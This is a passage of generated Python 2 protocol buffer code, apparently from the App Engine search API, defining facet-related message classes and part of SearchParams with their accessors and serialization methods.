res+=prefix+("name%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
cnt=0
for e in self.expression_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("Expression%s {\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+"}\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kExpressionGroup = 2
kExpressionname = 3
kExpressionexpression = 4
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "Expression",
3: "name",
4: "expression",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STARTGROUP,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FieldSpec'
class FacetRange(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_start_ = 0
start_ = ""
has_end_ = 0
end_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def start(self): return self.start_
def set_start(self, x):
self.has_start_ = 1
self.start_ = x
def clear_start(self):
if self.has_start_:
self.has_start_ = 0
self.start_ = ""
def has_start(self): return self.has_start_
def end(self): return self.end_
def set_end(self, x):
self.has_end_ = 1
self.end_ = x
def clear_end(self):
if self.has_end_:
self.has_end_ = 0
self.end_ = ""
def has_end(self): return self.has_end_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_start()): self.set_start(x.start())
if (x.has_end()): self.set_end(x.end())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_start_ != x.has_start_: return 0
if self.has_start_ and self.start_ != x.start_: return 0
if self.has_end_ != x.has_end_: return 0
if self.has_end_ and self.end_ != x.end_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_name_): n += 1 + self.lengthString(len(self.name_))
if (self.has_start_): n += 1 + self.lengthString(len(self.start_))
if (self.has_end_): n += 1 + self.lengthString(len(self.end_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_name_): n += 1 + self.lengthString(len(self.name_))
if (self.has_start_): n += 1 + self.lengthString(len(self.start_))
if (self.has_end_): n += 1 + self.lengthString(len(self.end_))
return n
def Clear(self):
self.clear_name()
self.clear_start()
self.clear_end()
def OutputUnchecked(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_start_):
out.putVarInt32(18)
out.putPrefixedString(self.start_)
if (self.has_end_):
out.putVarInt32(26)
out.putPrefixedString(self.end_)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_start_):
out.putVarInt32(18)
out.putPrefixedString(self.start_)
if (self.has_end_):
out.putVarInt32(26)
out.putPrefixedString(self.end_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
self.set_start(d.getPrefixedString())
continue
if tt == 26:
self.set_end(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_start_: res+=prefix+("start: %s\n" % self.DebugFormatString(self.start_))
if self.has_end_: res+=prefix+("end: %s\n" % self.DebugFormatString(self.end_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kstart = 2
kend = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "start",
3: "end",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRange'
class FacetRequestParam(ProtocolBuffer.ProtocolMessage):
has_value_limit_ = 0
value_limit_ = 0
def __init__(self, contents=None):
self.range_ = []
self.value_constraint_ = []
if contents is not None: self.MergeFromString(contents)
def value_limit(self): return self.value_limit_
def set_value_limit(self, x):
self.has_value_limit_ = 1
self.value_limit_ = x
def clear_value_limit(self):
if self.has_value_limit_:
self.has_value_limit_ = 0
self.value_limit_ = 0
def has_value_limit(self): return self.has_value_limit_
def range_size(self): return len(self.range_)
def range_list(self): return self.range_
def range(self, i):
return self.range_[i]
def mutable_range(self, i):
return self.range_[i]
def add_range(self):
x = FacetRange()
self.range_.append(x)
return x
def clear_range(self):
self.range_ = []
def value_constraint_size(self): return len(self.value_constraint_)
def value_constraint_list(self): return self.value_constraint_
def value_constraint(self, i):
return self.value_constraint_[i]
def set_value_constraint(self, i, x):
self.value_constraint_[i] = x
def add_value_constraint(self, x):
self.value_constraint_.append(x)
def clear_value_constraint(self):
self.value_constraint_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_value_limit()): self.set_value_limit(x.value_limit())
for i in xrange(x.range_size()): self.add_range().CopyFrom(x.range(i))
for i in xrange(x.value_constraint_size()): self.add_value_constraint(x.value_constraint(i))
def Equals(self, x):
if x is self: return 1
if self.has_value_limit_ != x.has_value_limit_: return 0
if self.has_value_limit_ and self.value_limit_ != x.value_limit_: return 0
if len(self.range_) != len(x.range_): return 0
for e1, e2 in zip(self.range_, x.range_):
if e1 != e2: return 0
if len(self.value_constraint_) != len(x.value_constraint_): return 0
for e1, e2 in zip(self.value_constraint_, x.value_constraint_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.range_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
if (self.has_value_limit_): n += 1 + self.lengthVarInt64(self.value_limit_)
n += 1 * len(self.range_)
for i in xrange(len(self.range_)): n += self.lengthString(self.range_[i].ByteSize())
n += 1 * len(self.value_constraint_)
for i in xrange(len(self.value_constraint_)): n += self.lengthString(len(self.value_constraint_[i]))
return n
def ByteSizePartial(self):
n = 0
if (self.has_value_limit_): n += 1 + self.lengthVarInt64(self.value_limit_)
n += 1 * len(self.range_)
for i in xrange(len(self.range_)): n += self.lengthString(self.range_[i].ByteSizePartial())
n += 1 * len(self.value_constraint_)
for i in xrange(len(self.value_constraint_)): n += self.lengthString(len(self.value_constraint_[i]))
return n
def Clear(self):
self.clear_value_limit()
self.clear_range()
self.clear_value_constraint()
def OutputUnchecked(self, out):
if (self.has_value_limit_):
out.putVarInt32(8)
out.putVarInt32(self.value_limit_)
for i in xrange(len(self.range_)):
out.putVarInt32(18)
out.putVarInt32(self.range_[i].ByteSize())
self.range_[i].OutputUnchecked(out)
for i in xrange(len(self.value_constraint_)):
out.putVarInt32(26)
out.putPrefixedString(self.value_constraint_[i])
def OutputPartial(self, out):
if (self.has_value_limit_):
out.putVarInt32(8)
out.putVarInt32(self.value_limit_)
for i in xrange(len(self.range_)):
out.putVarInt32(18)
out.putVarInt32(self.range_[i].ByteSizePartial())
self.range_[i].OutputPartial(out)
for i in xrange(len(self.value_constraint_)):
out.putVarInt32(26)
out.putPrefixedString(self.value_constraint_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_value_limit(d.getVarInt32())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_range().TryMerge(tmp)
continue
if tt == 26:
self.add_value_constraint(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_value_limit_: res+=prefix+("value_limit: %s\n" % self.DebugFormatInt32(self.value_limit_))
cnt=0
for e in self.range_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("range%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
cnt=0
for e in self.value_constraint_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("value_constraint%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kvalue_limit = 1
krange = 2
kvalue_constraint = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "value_limit",
2: "range",
3: "value_constraint",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRequestParam'
class FacetAutoDetectParam(ProtocolBuffer.ProtocolMessage):
has_value_limit_ = 0
value_limit_ = 10
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def value_limit(self): return self.value_limit_
def set_value_limit(self, x):
self.has_value_limit_ = 1
self.value_limit_ = x
def clear_value_limit(self):
if self.has_value_limit_:
self.has_value_limit_ = 0
self.value_limit_ = 10
def has_value_limit(self): return self.has_value_limit_
def MergeFrom(self, x):
assert x is not self
if (x.has_value_limit()): self.set_value_limit(x.value_limit())
def Equals(self, x):
if x is self: return 1
if self.has_value_limit_ != x.has_value_limit_: return 0
if self.has_value_limit_ and self.value_limit_ != x.value_limit_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_value_limit_): n += 1 + self.lengthVarInt64(self.value_limit_)
return n
def ByteSizePartial(self):
n = 0
if (self.has_value_limit_): n += 1 + self.lengthVarInt64(self.value_limit_)
return n
def Clear(self):
self.clear_value_limit()
def OutputUnchecked(self, out):
if (self.has_value_limit_):
out.putVarInt32(8)
out.putVarInt32(self.value_limit_)
def OutputPartial(self, out):
if (self.has_value_limit_):
out.putVarInt32(8)
out.putVarInt32(self.value_limit_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_value_limit(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_value_limit_: res+=prefix+("value_limit: %s\n" % self.DebugFormatInt32(self.value_limit_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kvalue_limit = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "value_limit",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetAutoDetectParam'
class FacetRequest(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_params_ = 0
params_ = None
def __init__(self, contents=None):
self.lazy_init_lock_ = thread.allocate_lock()
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def params(self):
if self.params_ is None:
self.lazy_init_lock_.acquire()
try:
if self.params_ is None: self.params_ = FacetRequestParam()
finally:
self.lazy_init_lock_.release()
return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params()
def clear_params(self):
if self.has_params_:
self.has_params_ = 0;
if self.params_ is not None: self.params_.Clear()
def has_params(self): return self.has_params_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (self.has_params_ and not self.params_.IsInitialized(debug_strs)): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
if (self.has_params_): n += 1 + self.lengthString(self.params_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_params_): n += 1 + self.lengthString(self.params_.ByteSizePartial())
return n
def Clear(self):
self.clear_name()
self.clear_params()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_params_):
out.putVarInt32(18)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_params_):
out.putVarInt32(18)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kparams = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "params",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRequest'
class FacetRefinement_Range(ProtocolBuffer.ProtocolMessage):
has_start_ = 0
start_ = ""
has_end_ = 0
end_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def start(self): return self.start_
def set_start(self, x):
self.has_start_ = 1
self.start_ = x
def clear_start(self):
if self.has_start_:
self.has_start_ = 0
self.start_ = ""
def has_start(self): return self.has_start_
def end(self): return self.end_
def set_end(self, x):
self.has_end_ = 1
self.end_ = x
def clear_end(self):
if self.has_end_:
self.has_end_ = 0
self.end_ = ""
def has_end(self): return self.has_end_
def MergeFrom(self, x):
assert x is not self
if (x.has_start()): self.set_start(x.start())
if (x.has_end()): self.set_end(x.end())
def Equals(self, x):
if x is self: return 1
if self.has_start_ != x.has_start_: return 0
if self.has_start_ and self.start_ != x.start_: return 0
if self.has_end_ != x.has_end_: return 0
if self.has_end_ and self.end_ != x.end_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_start_): n += 1 + self.lengthString(len(self.start_))
if (self.has_end_): n += 1 + self.lengthString(len(self.end_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_start_): n += 1 + self.lengthString(len(self.start_))
if (self.has_end_): n += 1 + self.lengthString(len(self.end_))
return n
def Clear(self):
self.clear_start()
self.clear_end()
def OutputUnchecked(self, out):
if (self.has_start_):
out.putVarInt32(10)
out.putPrefixedString(self.start_)
if (self.has_end_):
out.putVarInt32(18)
out.putPrefixedString(self.end_)
def OutputPartial(self, out):
if (self.has_start_):
out.putVarInt32(10)
out.putPrefixedString(self.start_)
if (self.has_end_):
out.putVarInt32(18)
out.putPrefixedString(self.end_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_start(d.getPrefixedString())
continue
if tt == 18:
self.set_end(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_start_: res+=prefix+("start: %s\n" % self.DebugFormatString(self.start_))
if self.has_end_: res+=prefix+("end: %s\n" % self.DebugFormatString(self.end_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstart = 1
kend = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "start",
2: "end",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRefinement_Range'
class FacetRefinement(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_value_ = 0
value_ = ""
has_range_ = 0
range_ = None
def __init__(self, contents=None):
self.lazy_init_lock_ = thread.allocate_lock()
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def value(self): return self.value_
def set_value(self, x):
self.has_value_ = 1
self.value_ = x
def clear_value(self):
if self.has_value_:
self.has_value_ = 0
self.value_ = ""
def has_value(self): return self.has_value_
def range(self):
if self.range_ is None:
self.lazy_init_lock_.acquire()
try:
if self.range_ is None: self.range_ = FacetRefinement_Range()
finally:
self.lazy_init_lock_.release()
return self.range_
def mutable_range(self): self.has_range_ = 1; return self.range()
def clear_range(self):
if self.has_range_:
self.has_range_ = 0;
if self.range_ is not None: self.range_.Clear()
def has_range(self): return self.has_range_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_value()): self.set_value(x.value())
if (x.has_range()): self.mutable_range().MergeFrom(x.range())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_value_ != x.has_value_: return 0
if self.has_value_ and self.value_ != x.value_: return 0
if self.has_range_ != x.has_range_: return 0
if self.has_range_ and self.range_ != x.range_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (self.has_range_ and not self.range_.IsInitialized(debug_strs)): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
if (self.has_value_): n += 1 + self.lengthString(len(self.value_))
if (self.has_range_): n += 1 + self.lengthString(self.range_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_value_): n += 1 + self.lengthString(len(self.value_))
if (self.has_range_): n += 1 + self.lengthString(self.range_.ByteSizePartial())
return n
def Clear(self):
self.clear_name()
self.clear_value()
self.clear_range()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
if (self.has_range_):
out.putVarInt32(26)
out.putVarInt32(self.range_.ByteSize())
self.range_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
if (self.has_range_):
out.putVarInt32(26)
out.putVarInt32(self.range_.ByteSizePartial())
self.range_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
self.set_value(d.getPrefixedString())
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_range().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_value_: res+=prefix+("value: %s\n" % self.DebugFormatString(self.value_))
if self.has_range_:
res+=prefix+"range <\n"
res+=self.range_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kvalue = 2
krange = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "value",
3: "range",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRefinement'
class SearchParams(ProtocolBuffer.ProtocolMessage):
NONE = 0
SINGLE = 1
PER_RESULT = 2
_CursorType_NAMES = {
0: "NONE",
1: "SINGLE",
2: "PER_RESULT",
}
def CursorType_Name(cls, x): return cls._CursorType_NAMES.get(x, "")
CursorType_Name = classmethod(CursorType_Name)
STRICT = 0
RELAXED = 1
_ParsingMode_NAMES = {
0: "STRICT",
1: "RELAXED",
}
def ParsingMode_Name(cls, x): return cls._ParsingMode_NAMES.get(x, "")
ParsingMode_Name = classmethod(ParsingMode_Name)
has_index_spec_ = 0
has_query_ = 0
query_ = ""
has_cursor_ = 0
cursor_ = ""
has_offset_ = 0
offset_ = 0
has_cursor_type_ = 0
cursor_type_ = 0
has_limit_ = 0
limit_ = 20
has_matched_count_accuracy_ = 0
matched_count_accuracy_ = 0
has_scorer_spec_ = 0
scorer_spec_ = None
has_field_spec_ = 0
field_spec_ = None
has_keys_only_ = 0
keys_only_ = 0
has_parsing_mode_ = 0
parsing_mode_ = 0
has_auto_discover_facet_count_ = 0
auto_discover_facet_count_ = 0
has_facet_auto_detect_param_ = 0
facet_auto_detect_param_ = None
has_facet_depth_ = 0
facet_depth_ = 1000
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
self.sort_spec_ = []
self.include_facet_ = []
self.facet_refinement_ = []
self.lazy_init_lock_ = thread.allocate_lock()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def query(self): return self.query_
def set_query(self, x):
self.has_query_ = 1
self.query_ = x
def clear_query(self):
if self.has_query_:
self.has_query_ = 0
self.query_ = ""
def has_query(self): return self.has_query_
def cursor(self): return self.cursor_
def set_cursor(self, x):
self.has_cursor_ = 1
self.cursor_ = x
def clear_cursor(self):
if self.has_cursor_:
self.has_cursor_ = 0
self.cursor_ = ""
def has_cursor(self): return self.has_cursor_
def offset(self): return self.offset_
def set_offset(self, x):
self.has_offset_ = 1
self.offset_ = x
def clear_offset(self):
if self.has_offset_:
self.has_offset_ = 0
self.offset_ = 0
def has_offset(self): return self.has_offset_
def cursor_type(self): return self.cursor_type_
def set_cursor_type(self, x):
self.has_cursor_type_ = 1
self.cursor_type_ = x
def clear_cursor_type(self):
if self.has_cursor_type_:
self.has_cursor_type_ = 0
self.cursor_type_ = 0
def has_cursor_type(self): return self.has_cursor_type_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 20
def has_limit(self): return self.has_limit_
def matched_count_accuracy(self): return self.matched_count_accuracy_
def set_matched_count_accuracy(self, x):
self.has_matched_count_accuracy_ = 1
self.matched_count_accuracy_ = x
def clear_matched_count_accuracy(self):
if self.has_matched_count_accuracy_:
self.has_matched_count_accuracy_ = 0
self.matched_count_accuracy_ = 0
def has_matched_count_accuracy(self): return self.has_matched_count_accuracy_
def sort_spec_size(self): return len(self.sort_spec_)
def sort_spec_list(self): return self.sort_spec_
def sort_spec(self, i):
return self.sort_spec_[i]
def mutable_sort_spec(self, i):
return self.sort_spec_[i]
def add_sort_spec(self):
x = SortSpec()
self.sort_spec_.append(x)
return x
def clear_sort_spec(self):
self.sort_spec_ = []
def scorer_spec(self):
if self.scorer_spec_ is None:
self.lazy_init_lock_.acquire()
try:
if self.scorer_spec_ is None: self.scorer_spec_ = ScorerSpec()
finally:
self.lazy_init_lock_.release()
return self.scorer_spec_
def mutable_scorer_spec(self): self.has_scorer_spec_ = 1; return self.scorer_spec()
def clear_scorer_spec(self):
if self.has_scorer_spec_:
self.has_scorer_spec_ = 0;
if self.scorer_spec_ is not None: self.scorer_spec_.Clear()
def has_scorer_spec(self): return self.has_scorer_spec_
def field_spec(self):
if self.field_spec_ is None:
self.lazy_init_lock_.acquire()
try:
if self.field_spec_ is None: self.field_spec_ = FieldSpec()
finally:
self.lazy_init_lock_.release()
return self.field_spec_
def mutable_field_spec(self): self.has_field_spec_ = 1; return self.field_spec()
def clear_field_spec(self):
if self.has_field_spec_:
self.has_field_spec_ = 0;
if self.field_spec_ is not None: self.field_spec_.Clear()
def has_field_spec(self): return self.has_field_spec_
def keys_only(self): return self.keys_only_
def set_keys_only(self, x):
self.has_keys_only_ = 1
self.keys_only_ = x
def clear_keys_only(self):
if self.has_keys_only_:
self.has_keys_only_ = 0
self.keys_only_ = 0
def has_keys_only(self): return self.has_keys_only_
def parsing_mode(self): return self.parsing_mode_
def set_parsing_mode(self, x):
self.has_parsing_mode_ = 1
self.parsing_mode_ = x
def clear_parsing_mode(self):
if self.has_parsing_mode_:
self.has_parsing_mode_ = 0
self.parsing_mode_ = 0
def has_parsing_mode(self): return self.has_parsing_mode_
def auto_discover_facet_count(self): return self.auto_discover_facet_count_
def set_auto_discover_facet_count(self, x):
self.has_auto_discover_facet_count_ = 1
self.auto_discover_facet_count_ = x
def clear_auto_discover_facet_count(self):
if self.has_auto_discover_facet_count_:
self.has_auto_discover_facet_count_ = 0
self.auto_discover_facet_count_ = 0
def has_auto_discover_facet_count(self): return self.has_auto_discover_facet_count_
def include_facet_size(self): return len(self.include_facet_)
def include_facet_list(self): return self.include_facet_
def include_facet(self, i):
return self.include_facet_[i]
def mutable_include_facet(self, i):
return self.include_facet_[i]
def add_include_facet(self):
x = FacetRequest()
self.include_facet_.append(x)
return x
def clear_include_facet(self):
self.include_facet_ = []
def facet_refinement_size(self): return len(self.facet_refinement_)
def facet_refinement_list(self): return self.facet_refinement_
def facet_refinement(self, i):
return self.facet_refinement_[i]
def mutable_facet_refinement(self, i):
return self.facet_refinement_[i]
def add_facet_refinement(self):
x = FacetRefinement()
self.facet_refinement_.append(x)
return x
def clear_facet_refinement(self):
self.facet_refinement_ = []
def facet_auto_detect_param(self):
if self.facet_auto_detect_param_ is None:
self.lazy_init_lock_.acquire()
try:
if self.facet_auto_detect_param_ is None: self.facet_auto_detect_param_ = FacetAutoDetectParam()
finally:
self.lazy_init_lock_.release()
return self.facet_auto_detect_param_
def mutable_facet_auto_detect_param(self): self.has_facet_auto_detect_param_ = 1; return self.facet_auto_detect_param()
def clear_facet_auto_detect_param(self):
if self.has_facet_auto_detect_param_:
self.has_facet_auto_detect_param_ = 0;
if self.facet_auto_detect_param_ is not None: self.facet_auto_detect_param_.Clear()
def has_facet_auto_detect_param(self): return self.has_facet_auto_detect_param_
def facet_depth(self): return self.facet_depth_
def set_facet_depth(self, x):
self.has_facet_depth_ = 1
self.facet_depth_ = x
def clear_facet_depth(self):
if self.has_facet_depth_:
self.has_facet_depth_ = 0
self.facet_depth_ = 1000
def has_facet_depth(self): return self.has_facet_depth_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
if (x.has_query()): self.set_query(x.query())
if (x.has_cursor()): self.set_cursor(x.cursor())
if (x.has_offset()): self.set_offset(x.offset())
if (x.has_cursor_type()): self.set_cursor_type(x.cursor_type())
if (x.has_limit()): self.set_limit(x.limit())
if (x.has_matched_count_accuracy()): self.set_matched_count_accuracy(x.matched_count_accuracy())
for i in xrange(x.sort_spec_size()): self.add_sort_spec().CopyFrom(x.sort_spec(i))
if (x.has_scorer_spec()): self.mutable_scorer_spec().MergeFrom(x.scorer_spec())
